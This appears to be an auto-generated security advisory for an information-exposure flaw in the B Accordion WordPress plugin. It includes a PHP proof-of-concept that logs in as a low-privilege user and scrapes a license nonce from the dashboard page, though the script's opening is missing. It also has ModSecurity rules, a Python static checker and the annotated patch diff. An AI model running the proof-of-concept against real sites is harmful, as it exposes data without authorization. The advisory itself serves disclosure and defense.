Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-24565: B Accordion <= 2.0.2 – Authenticated (Contributor+) Information Exposure (b-accordion)

Plugin: b-accordion
Severity: Medium (CVSS 4.3)
CWE: 200
Vulnerable version: 2.0.2
Patched version: 2.0.3
Disclosed: January 20, 2026

Analysis Overview

Analysis (analysis)

Atomic Edge analysis of CVE-2026-24565:

The vulnerability is an authenticated information exposure flaw in the Accordion WordPress plugin, versions <= 2.0.2. It allows Contributor-level and higher-privileged users to access sensitive configuration data and user information via the plugin's admin dashboard endpoint. The CVSS score of 4.3 reflects a medium-severity exposure risk.

The root cause is a missing capability check in the bab_Dashboard_page() function in class_babAdmin.php. The function, at lines 48-62, outputs sensitive plugin configuration data including version information, premium status, and a license activation nonce. Before the patch, this function executed without verifying the user's permissions, so any authenticated user could trigger it through the admin menu hook, exposing data that should be restricted to administrators.

Exploitation requires an authenticated attacker with at least Contributor-level access. The attacker navigates to the plugin's admin dashboard page at /wp-admin/admin.php?page=bab-dashboard. This endpoint calls bab_Dashboard_page(), which outputs JSON-encoded sensitive data in a div element's data-info attribute. The attacker can read this data directly from the page source or with an automated script; no special parameters or payloads are needed beyond accessing the vulnerable endpoint.

The patch adds a capability check at lines 51-53 of class_babAdmin.php. The condition `if (!current_user_can('manage_options'))` prevents execution for users without administrator privileges; the function now returns early for unauthorized users. Additional hardening includes ABSPATH checks across multiple files, consistent function naming (bAIsPremium() renamed to bab_is_premium()), and improved input validation in the shortcode handler.

Successful exploitation exposes sensitive plugin configuration data including license status, version information, and the license activation nonce. While this does not directly enable privilege escalation or remote code execution, the exposed information could facilitate further attacks: the license nonce could potentially be abused in license management functions, and the leak gives attackers intelligence about the plugin's configuration and licensing status. The data leak violates confidentiality principles.

Proof-of-concept script (poc_php; the opening of the script, up to the start of the login POST array, is missing from the page as published)

```php
// Atomic Edge CVE Research – Proof of Concept
// CVE-2026-24565 – B Accordion <= 2.0.2 – Authenticated (Contributor+) Information Exposure

 $username,
 'pwd' => $password,
 'wp-submit' => 'Log In',
 'redirect_to' => $admin_url,
 'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Access the vulnerable dashboard page
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Step 3: Extract sensitive data from response
if (preg_match('/data-info=\'([^\']+)\'/', $response, $matches)) {
    $json_data = html_entity_decode($matches[1]);
    $config_data = json_decode($json_data, true);

    echo "[+] Vulnerable endpoint accessed successfully\n";
    echo "[+] Extracted sensitive configuration data:\n";
    echo "    Version: " . $config_data['version'] . "\n";
    echo "    Is Premium: " . ($config_data['isPremium'] ? 'Yes' : 'No') . "\n";
    echo "    Has Pro: " . ($config_data['hasPro'] ? 'Yes' : 'No') . "\n";
    echo "    License Nonce: " . $config_data['licenseActiveNonce'] . "\n";
} else {
    echo "[-] Could not find sensitive data in response\n";
    echo "[-] Response preview: " . substr($response, 0, 500) . "\n";
}

curl_close($ch);

?>
```

WAF rule (modsecurity_rule)

```
# Atomic Edge WAF Rule – CVE-2026-24565
SecRule REQUEST_URI "@rx ^/wp-admin/(admin\.php|admin-post\.php)$" \
    "id:1000245,phase:2,deny,status:403,chain,msg:'CVE-2026-24565 – B Accordion plugin information exposure via admin dashboard',severity:'MEDIUM',tag:'CVE-2026-24565',tag:'WordPress',tag:'Plugin',tag:'Accordion'"
    SecRule ARGS_GET:page "@streq bab-dashboard" \
        "chain,t:none"
    SecRule &REQUEST_COOKIES:/^wordpress_logged_in_/ "@eq 0" \
        "msg:'Unauthenticated access attempt to B Accordion dashboard'"

SecRule REQUEST_URI "@rx ^/wp-admin/(admin\.php|admin-post\.php)$" \
    "id:1000246,phase:2,deny,status:403,chain,msg:'CVE-2026-24565 – B Accordion plugin information exposure via admin dashboard',severity:'MEDIUM',tag:'CVE-2026-24565',tag:'WordPress',tag:'Plugin',tag:'Accordion'"
    SecRule ARGS_GET:page "@streq bab-dashboard" \
        "chain,t:none"
    SecRule REQUEST_COOKIES:/^wordpress_logged_in_/ "@rx ^.*(contributor|author|subscriber).*$" \
        "msg:'Non-admin user attempting to access B Accordion dashboard'"
```
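The root cause described above is a whole class of bug, not a one-off: an admin-page callback that prints sensitive values without checking permissions, reachable because the menu entry was registered with a capability that non-administrators hold. The following is an added example, not code from the Atomic Edge page or from the b-accordion plugin. It is a small Python static check that walks a plugin's PHP source, finds every add_menu_page()/add_submenu_page() registration, and reports callbacks that are reachable under a low capability and never call current_user_can() themselves (WordPress gates /wp-admin/admin.php?page=<slug> on the registered capability, so both the registered capability and an in-callback check matter). The two PHP sources embedded in the block are constructed, abbreviated stand-ins for the pre- and post-patch class_babAdmin.php; the parent menu slug and the 'edit_posts' capability in them are assumptions, since the page does not show the add_submenu_page() arguments.

```python
"""Static check for WordPress admin-page callbacks that render without a
capability guard. Added example, not code from the Atomic Edge page or the
b-accordion plugin; the PHP samples below are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional

MENU_CALL_RE = re.compile(r"\badd_(?P<kind>sub)?menu_page\s*\(")
# Capabilities that already restrict a menu entry to site administrators.
HIGH_PRIV_CAPS = {"manage_options", "activate_plugins", "install_plugins", "edit_plugins"}


@dataclass
class MenuPage:
    callback: str
    capability: str     # capability passed to add_(sub)menu_page()
    guarded: bool       # callback calls current_user_can() itself
    emits_nonce: bool   # callback prints a wp_create_nonce() value

    @property
    def risky(self) -> bool:
        # A low-capability entry whose callback never re-checks permissions.
        return not self.guarded and self.capability not in HIGH_PRIV_CAPS


def _balanced(src: str, start: int, open_ch: str, close_ch: str) -> str:
    """Text between the delimiter at src[start] and its matching close.
    Simplification: strings/comments are not parsed, so a brace inside a
    string literal can fool the scan."""
    depth = 0
    for i in range(start, len(src)):
        if src[i] == open_ch:
            depth += 1
        elif src[i] == close_ch:
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
    raise ValueError("unbalanced %s%s" % (open_ch, close_ch))


def _split_args(arglist: str) -> List[str]:
    """Split a PHP argument list on commas not nested inside ()/[]."""
    args, cur, depth = [], [], 0
    for c in arglist:
        if c in "([":
            depth += 1
        elif c in ")]":
            depth -= 1
        if c == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
    if "".join(cur).strip():
        args.append("".join(cur).strip())
    return args


def _literal(arg: str) -> Optional[str]:
    m = re.fullmatch(r"""['"]([^'"]*)['"]""", arg)
    return m.group(1) if m else None


def _callback_name(arg: str) -> Optional[str]:
    # Accepts 'name', [$this, 'name'] and array($this, 'name').
    m = re.search(r"""['"](\w+)['"]\s*[\])]?\s*$""", arg)
    return m.group(1) if m else None


def _function_body(src: str, name: str) -> Optional[str]:
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    return _balanced(src, m.end() - 1, "{", "}") if m else None


def audit_menu_pages(php_src: str) -> List[MenuPage]:
    """One MenuPage per add_(sub)menu_page() call whose callback is defined
    in php_src."""
    pages = []
    for m in MENU_CALL_RE.finditer(php_src):
        args = _split_args(_balanced(php_src, m.end() - 1, "(", ")"))
        # add_menu_page(title, menu, capability, slug, callback, ...)
        # add_submenu_page(parent, title, menu, capability, slug, callback, ...)
        off = 1 if m.group("kind") else 0
        if len(args) <= 4 + off:
            continue
        cap = _literal(args[2 + off]) or args[2 + off]
        name = _callback_name(args[4 + off])
        body = _function_body(php_src, name) if name else None
        if body is None:
            continue
        pages.append(MenuPage(callback=name, capability=cap,
                              guarded="current_user_can(" in body,
                              emits_nonce="wp_create_nonce(" in body))
    return pages


def risky_callbacks(php_src: str) -> List[str]:
    return [p.callback for p in audit_menu_pages(php_src) if p.risky]


# Constructed stand-in for the 2.0.2 admin class. Parent slug and the
# 'edit_posts' capability (which Contributors hold) are assumptions.
VULNERABLE_SRC = """<?php
class babAdmin {
    public function bab_sub_Menu() {
        add_submenu_page(
            'edit.php?post_type=accordion_block',
            'Dashboard',
            'Dashboard',
            'edit_posts',
            'bab-dashboard',
            [$this, 'bab_Dashboard_page']
        );
    }
    public function bab_Dashboard_page() {
        ?>
        <div id='vgbDashboard' data-info='<?php echo esc_attr(wp_json_encode([
            'version' => BAB_PLUGIN_VERSION,
            'licenseActiveNonce' => wp_create_nonce('csbLicenseActive')
        ])); ?>'></div>
        <?php
    }
}
"""

# Same class with the 2.0.3 shape of the fix: capability check before output.
PATCHED_SRC = VULNERABLE_SRC.replace(
    "public function bab_Dashboard_page() {",
    "public function bab_Dashboard_page() {\n"
    "        if (!current_user_can('manage_options')) {\n"
    "            return;\n"
    "        }",
)

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_SRC), ("patched", PATCHED_SRC)):
        for p in audit_menu_pages(src):
            print(label, p.callback, "cap=%s guarded=%s nonce=%s risky=%s"
                  % (p.capability, p.guarded, p.emits_nonce, p.risky))
```

Run over a real plugin, the check is a triage aid rather than a verdict: a callback flagged risky still needs a human to confirm what it prints, and the fix is the one in the diff (raise the registered capability and add current_user_can() before any output), not a WAF rule, since the request itself is indistinguishable from a legitimate administrator's.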

Differential between vulnerable and patched code

Code Diff
--- a/b-accordion/accordion-block.php
+++ b/b-accordion/accordion-block.php
@@ -1,33 +1,38 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 if (!class_exists('babBlock')) {
     class babBlock {
         public function __construct() {
             add_action('init', [$this, 'onInit']);
-            add_action('enqueue_block_editor_assets', [$this, "BACEnqueueEditorAssets"]);
-            add_action('enqueue_block_assets', [$this, "BACEnqueueFrontendAssets"]);
+            add_action('enqueue_block_editor_assets', [$this, 'BACEnqueueEditorAssets']);
+            add_action('enqueue_block_assets', [$this, 'BACEnqueueFrontendAssets']);
         }
         public function onInit() {
             register_block_type(__DIR__ . '/build');
         }
         public function BACEnqueueEditorAssets() {
-            wp_add_inline_script(
-                'bab-accordion-editor-script',
-                'const bAIsPipeChecker = ' . wp_json_encode(bAIsPremium()) . ';',
-                'before'
-            );
-
+            if ( wp_script_is('bab-accordion-editor-script', 'registered') ) {
+                wp_add_inline_script(
+                    'bab-accordion-editor-script',
+                    'const bAIsPipeChecker = ' . wp_json_encode(bab_is_premium()) . ';',
+                    'before'
+                );
+            }
         }
         public function BACEnqueueFrontendAssets() {
-            wp_add_inline_script(
-                'bab-accordion-view-script',
-                'const bAIsPipeChecker = ' . wp_json_encode(bAIsPremium()) . ';',
-                'before'
-            );
+            if ( wp_script_is('bab-accordion-view-script', 'registered') ) {
+                wp_add_inline_script(
+                    'bab-accordion-view-script',
+                    'const bAIsPipeChecker = ' . wp_json_encode(bab_is_premium()) . ';',
+                    'before'
+                );
+            }
         }
-
     }
-    new babBlock();
-}
-

+    new babBlock();
+}
 No newline at end of file
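Review bot: the `wp_script_is(..., 'registered')` guards only suppress the notice when the handle is missing; they do not change what is exposed, since `bAIsPipeChecker` still publishes the premium flag to every page that loads the block assets. That is a single boolean, so it is acceptable, but the rename to `bab_is_premium()` means this file now depends on includes/function.php having been loaded first; worth confirming the require order in index.php, which is outside this diff.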
--- a/b-accordion/build/admin-dashboard.asset.php
+++ b/b-accordion/build/admin-dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-api-fetch', 'wp-components', 'wp-data'), 'version' => '2e79a7f198af1958751a');
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-api-fetch', 'wp-components', 'wp-data'), 'version' => 'd2fb2a4d89fc08fcab93');
--- a/b-accordion/build/index.asset.php
+++ b/b-accordion/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n'), 'version' => '4b3f7f6d610ff4a1b7e5');
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n'), 'version' => 'f70e24c2a9b539aee64c');
--- a/b-accordion/build/render.php
+++ b/b-accordion/build/render.php
@@ -1,6 +1,12 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
 $id = wp_unique_id('babAccordion-');
-
 ?>
-<div <?php echo get_block_wrapper_attributes(); ?> id='<?php echo esc_attr($id); ?>'
-  data-attributes='<?php echo esc_attr(wp_json_encode($attributes)); ?>'></div>
 No newline at end of file
+<div
+    <?php // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
+    <?php echo get_block_wrapper_attributes(); ?>
+    id="<?php echo esc_attr( $id ); ?>"
+    data-attributes="<?php echo esc_attr( wp_json_encode( $attributes ) ); ?>">
+</div>
 No newline at end of file
--- a/b-accordion/includes/class_babAdmin.php
+++ b/b-accordion/includes/class_babAdmin.php
@@ -1,16 +1,19 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}

 if (!class_exists('babAdmin')) {
-
-    class babAdmin {
-        public function __construct()  {
+    class babAdmin
+    {
+        public function __construct()
+        {
             add_action('init', [$this, 'bab_accordion_block_post_type']);
             add_action('admin_menu', [$this, 'bab_sub_Menu']);
             add_filter('manage_accordion_block_posts_columns', [$this, 'accordionManageColumns'], 10);
             add_action('manage_accordion_block_posts_custom_column', [$this, 'accordionManageCustomColumns'], 10, 2);
         }
-
         public function bab_accordion_block_post_type()
         {
             register_post_type(
@@ -34,7 +37,6 @@
                 )
             );
         }
-
         public function bab_sub_Menu()
         {
             add_submenu_page(
@@ -46,21 +48,22 @@
                 [$this, 'bab_Dashboard_page']
             );
         }
-
         public function bab_Dashboard_page()
         {
+
+            if (!current_user_can('manage_options')) {
+                return;
+            }
             ?>
             <div id='vgbDashboard' data-info='<?php echo esc_attr(wp_json_encode([
                 'version' => BAB_PLUGIN_VERSION,
-                'isPremium' => bAIsPremium(),
+                'isPremium' => bab_is_premium(),
                 'hasPro' => BAB_HAS_PRO,
-                'licenseActiveNonce' => wp_create_nonce('csbLicenseActive')
+                'licenseActiveNonce' => wp_create_nonce('bab_license_active')
             ])); ?>'></div>
             <?php
         }

-
-        //manage column
         public function accordionManageColumns($defaults)
         {
             unset($defaults['date']);
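Review bot: the `current_user_can('manage_options')` check is the actual fix, but a bare `return;` leaves a blank admin page and records nothing; the WordPress convention is `wp_die( esc_html__( 'Sorry, you are not allowed to access this page.' ), 403 );`, which also produces a 403 that logging and a WAF can key on. Since `manage_options` is now the effective requirement, the capability argument of `add_submenu_page()` (just above the visible context) should be raised to match so the entry is not listed for Contributors at all. The nonce action also changes from `csbLicenseActive` to `bab_license_active`; any handler that verifies the old action must be updated in the same release or license activation will fail silently. The stray empty `+` line after the opening brace can be dropped.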
@@ -68,22 +71,16 @@
             $defaults['date'] = 'Date';
             return $defaults;
         }
-
-        // custom manage column
         public function accordionManageCustomColumns($column_name, $post_ID)
         {
-            if ($column_name == 'shortcode') {
+            if ($column_name === 'shortcode') {
                 echo '<div class="bPlAdminShortcode" id="bPlAdminShortcode-' . esc_attr($post_ID) . '">
 					<input value="[accordion id=' . esc_attr($post_ID) . ']" onclick="copyBPlAdminShortcode('' . esc_attr($post_ID) . '')" readonly>
 					<span class="tooltip">Copy To Clipboard</span>
 				</div>';
             }
         }
-
-
-
     }
-
     new babAdmin();

-}
 No newline at end of file
+}
--- a/b-accordion/includes/class_babPlugin.php
+++ b/b-accordion/includes/class_babPlugin.php
@@ -1,4 +1,9 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 if (!class_exists('babPlugin')) {
     class babPlugin
     {
@@ -39,22 +44,36 @@
         }
         public function bab_shortcode_handler($atts)
         {
-            if (!isset($atts['id'])) {
+            $atts = shortcode_atts(
+                array(
+                    'id' => 0
+                ),
+                $atts,
+                'accordion'
+            );
+            $post_id = intval($atts['id']);
+            if (!$post_id) {
                 return '<p>Please provide a valid ID.</p>';
             }
-            $post = get_post($atts['id']);
-            if ($post) {
-                $blocks = parse_blocks($post->post_content);
-                if (!empty($blocks)) {
-                    foreach ($blocks as $block) {
-                        return render_block($block);
-                    }
-                }
-            } else {
-                return '<p>Error: Accordion block with ID ' . esc_html($atts['id']) . ' not found.</p>';
+            $post = get_post(absint($post_id));
+            if (
+                !$post ||
+                $post->post_type !== 'accordion_block' ||
+                $post->post_status !== 'publish'
+            ) {
+                return '<p>Invalid accordion ID.</p>';
             }

-        }
+            $blocks = parse_blocks($post->post_content);

+            if (!empty($blocks)) {
+                $output = '';
+                foreach ($blocks as $block) {
+                    $output .= render_block($block);
+                }
+                return $output;
+            }
+            return '';
+        }
     }
-}
 No newline at end of file
+}
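Review bot: the `post_type === 'accordion_block'` and `post_status === 'publish'` checks close a second exposure in the old handler, which would `parse_blocks()` and render the content of any post ID regardless of type or status, so a shortcode could surface draft or private content. Two nits: `absint()` applied to a value that already went through `intval()` is redundant, and because `if (!$post_id)` only rejects zero, a negative id slips through and `absint()` silently maps it to a different post; use `absint()` once and drop `intval()`. Also, the old loop returned after the first block while the new code concatenates all blocks, a behaviour change worth a changelog line.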
--- a/b-accordion/includes/function.php
+++ b/b-accordion/includes/function.php
@@ -1,7 +1,11 @@
 <?php

-function bAIsPremium() {
-    return BAB_HAS_PRO ? ba_fs()->can_use_premium_code() : false;
+if (!defined('ABSPATH')) {
+    exit;
 }

+function bab_is_premium()
+{
+    return BAB_HAS_PRO ? ba_fs()->can_use_premium_code() : false;
+}

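Review bot: `bAIsPremium()` is removed outright rather than deprecated, so any theme or companion code still calling it will fatal with an undefined-function error after the update. If other callers cannot be ruled out, keep a thin wrapper for one release, e.g. `function bAIsPremium() { _deprecated_function( __FUNCTION__, '2.0.3', 'bab_is_premium' ); return bab_is_premium(); }`.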
--- a/b-accordion/index.php
+++ b/b-accordion/index.php
@@ -3,7 +3,7 @@
 /**
  * Plugin Name: Accordion
  * Description: Display customizable accordion in beautiful way.
- * Version: 2.0.2
+ * Version: 2.0.3
  * Author: bPlugins
  * Author URI: https://bplugins.com
  * License: GPLv3
@@ -17,7 +17,7 @@
 if ( function_exists( 'ba_fs' ) ) {
     ba_fs()->set_basename( false, __FILE__ );
 } else {
-    define( 'BAB_PLUGIN_VERSION', ( isset( $_SERVER['HTTP_HOST'] ) && 'localhost' === $_SERVER['HTTP_HOST'] ? time() : '2.0.2' ) );
+    define( 'BAB_PLUGIN_VERSION', ( isset( $_SERVER['HTTP_HOST'] ) && 'localhost' === $_SERVER['HTTP_HOST'] ? time() : '2.0.3' ) );
     define( 'BAB_DIR_URL', plugin_dir_url( __FILE__ ) );
     define( 'BAB_DIR_PATH', plugin_dir_path( __FILE__ ) );
     define( 'BAB_ASSETS_DIR', plugin_dir_url( __FILE__ ) . 'assets/' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
